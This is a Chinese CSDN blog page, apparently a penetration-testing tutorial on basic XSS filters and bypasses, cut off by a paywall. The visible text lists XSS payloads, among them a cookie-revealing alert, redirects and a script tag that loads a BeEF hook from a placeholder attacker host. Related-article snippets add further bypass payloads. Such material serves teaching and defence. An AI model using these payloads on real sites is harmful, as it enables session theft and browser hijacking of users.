XSS攻击的简单过滤和绕过

最新推荐文章于 2024-09-15 13:46:58 发布
最新推荐文章于 2024-09-15 13:46:58 发布
阅读量3.4k 收藏 7
点赞数 1
分类专栏: 渗透测试 文章标签: xss 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caoxinjian423/article/details/108364182
版权
本文详细介绍了常见的XSS攻击脚本类型,包括弹窗警告、页面嵌套、重定向和访问恶意代码。接着探讨了简单过滤方法如大小写过滤和不区分大小写的过滤,并给出相应的绕过技巧,如利用嵌套标签和事件属性。最后总结了XSS防御的总体思路,强调输入过滤和输出编码的重要性。
摘要由CSDN通过智能技术生成

一、常见的XSS攻击脚本

  • 弹窗警告
    <script>alert('XSS')</script>
    <script>alert(document.cookie)</script>

  • 重定向
    <script>window.location="http://www.baidu.com"</script>

  • 弹窗警告并重定向
    <script>alert('网站升级更新,请移步新版本');location.href="https://www.baidu.com"</script>

  • 访问恶意代码
    <script src="http://BeEF_IP:3000/hook.js"></script>

二、简单过滤和绕过

  • 区分大小写过滤标签:
    过滤:
    $name=preg_replace("/<script>/","",$name); //过滤<script>
    $name=preg_replace("/<\/script>/","",$name); //过滤</scrip
最低0.47元/天 解锁文章
书院二层楼
关注
专栏目录
XSS过滤 XssFilter
LIUYEYEA的博客
11-02 2799
跨站脚本攻击,为不和层叠样式表的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的
xss绕过字符过滤_XSS过滤绕过总结
weixin_39610353的博客
12-21 1264
XSS过滤绕过总结黑名单过滤绕过黑名单模式下的过滤器是最常见的。他们的目标是检测特定模式并防止恶意行为。这完全是“模式”的问题,它们越准确,就越可以拦截攻击。1. 注入脚本代码主要是标签,可用于执行客户端脚本代码,例如JavaScript。 它是为此目的而设计的,当然,这是大多数过滤器阻止的第一个首选。1.1 绕过弱标签过滤简单过滤器无法涵盖所有可能的情况,所以可以绕开它们。 以下示例仅是对...
Xss漏洞常见绕过过滤攻击场景
chaottop的博客
05-04 2659
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
xss-labs靶场:level6攻略 大小写混淆绕过
最新发布
godfish44的博客
09-15 322
再说一下,关于闭合标签的事情,要多用引号去尝试,很少一次就能成功的,有些情况下引号被闭合时在前端代码中会消失,这是正常现象,一切以开发者工具中显示的前端代码为准,加油!当我们的payload被过滤时,我们可以尝试对其进行编码,这也是很常见的一种方法,常见的编码有html编码,url编码,在线编码的工具有很多,可以自行查找。代码中,我们将原本小写的href替换为了hreF,以此来绕过检测,当然,任意字母大小写都是可以的。恭喜大家闯过了前面的五关,第六关没有什么特殊的地方,就考察了一个大小写混淆的绕过方法。
过滤器防止xss攻击
yizhousai0662的博客
09-01 1351
将参数中有关xss攻击的非法字符全部处理掉。
关于XSS过滤
lanisa的专栏
10-30 1689
XSS攻击绕过过滤方法大全(约100种) XSS攻击绕过过滤方法大全(约100种) - 付杰博客 解决办法: 1.增加前端过滤 可参考:https://www.cnblogs.com/caizhenbo/p/6836390.html 【前端安全】JavaScript防XSS攻击 xss前端过滤工具:https://cdn.bootcdn.net/ajax/libs/js-xss/0.3.3/xss.min.js 使用方法:https://www.cnblogs.com/fyjz/p/11905.
XSS过滤
bylfsj的博客
09-26 562
XSS Bypass: 脚本标签: <object data=”data:text/html,<script>alert(1)</script>”> <object data=” data:text/html;base64,Jmx0O3NjcmlwdCZndDthbGVydCgxKSZsdDsvc2NyaXB0Jmd0Ow==”> <a h...
XSS跨站点脚本攻击
11-23 304
XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 以下为Java web项目中的解决方案: Filter代码: import java.io.IOException; import javax.servlet.Filter; i...
第十二节 XSS 过滤绕过-01
09-15
XSS 过滤绕过技术详解 ...XSS 过滤绕过技术需要攻击者具备深入的知识和经验,包括 Web 应用程序安全、XSS 攻击技术、自动化工具使用等。Web 开发者需要了解这些技术,来防止 XSS 攻击和保护用户信息。
记录几种XSS绕过方式1
08-03
XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者...了解并防御这些XSS绕过方法对于网站安全至关重要,开发者应当定期更新和强化过滤规则,同时进行安全审计,确保网站对XSS攻击有足够的防护能力。
XSSBypass:XSS绕过技术
05-17
XSS绕过技术是安全研究人员和黑客为了测试或利用这些漏洞而发展出的一系列策略。 1. **理解XSS类型** - 存储型XSS:攻击者的脚本被存储在服务器上,然后在多个用户访问同一页面时触发。 - 反射型XSS:脚本通过URL...
javascript过滤XSS
05-06
用javascript写的过滤XSS代码,危险代码被转义而不是被删除. 根目录下js-xss-master/dist/test.html是例子.
xss过滤
weixin_30535167的博客
07-09 338
content="""<p class='c1' id='i1'> asdfaa<span class='c2' style="font-family:NSimSun;">sdf<a>a</a>sdf</span>sdf</p><p> <strong class='c2' id='i2'&g...
对各类xss攻击手段的过滤
seastars的专栏
03-02 329
收录一下这篇文章,里面包含了各类xss绕过方法http://ha.ckers.org/xss.html我的富文本过滤器全部可以过滤,屏蔽所有不安全的代码。 不过个别地方比较粗暴,比如flash的action script挂马,我直接禁用了embed标签的src属性css的@import,,等也直接禁用href="javascript:",css的url(java
保姆级教学 XSS攻击过滤
m0_59206144的博客
06-07 1836
过滤策略:把特殊字符转为HTML实体编码, 这样存在数据库里较安全 返回给前端时会被js解析为正常字符,不影响查看
Xss过滤
weixin_43326384的博客
11-30 702
package com.my.filter; import com.my.bean.XssRequest; import org.springframework.context.annotation.Configuration; import javax.servlet.*; import javax.servlet.annotation.WebFilter; import javax.ser...
XSS攻击过滤处理
weixin_30302609的博客
05-02 1000
关于XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS漏洞的危害 网络钓鱼,包括盗取各类用户账号; 窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; 劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等; 强制弹出广告页面、刷流量等; 网页...
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 5483
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值